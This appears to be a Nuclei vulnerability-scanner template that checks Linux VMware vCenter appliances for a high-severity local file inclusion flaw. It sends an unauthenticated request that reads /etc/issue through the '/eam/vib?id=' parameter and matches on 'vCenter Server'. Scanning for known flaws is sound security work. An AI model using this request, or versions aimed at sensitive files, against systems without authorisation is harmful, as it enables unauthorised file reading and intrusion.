id: vmware-vcenter-lfi-linux

info:
  name: Linux Vmware Vcenter - Local File Inclusion
  author: PR3R00T
  severity: high
  description: Linux appliance based Vmware Vcenter is vulnerable to local file inclusion.
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: vmware,lfi,vcenter

requests:
  - method: GET
    path:
      - "{{BaseURL}}/eam/vib?id=/etc/issue"
    matchers:
      - type: word
        words:
          - "vCenter Server"

# Enhanced by mp on 2022/08/01
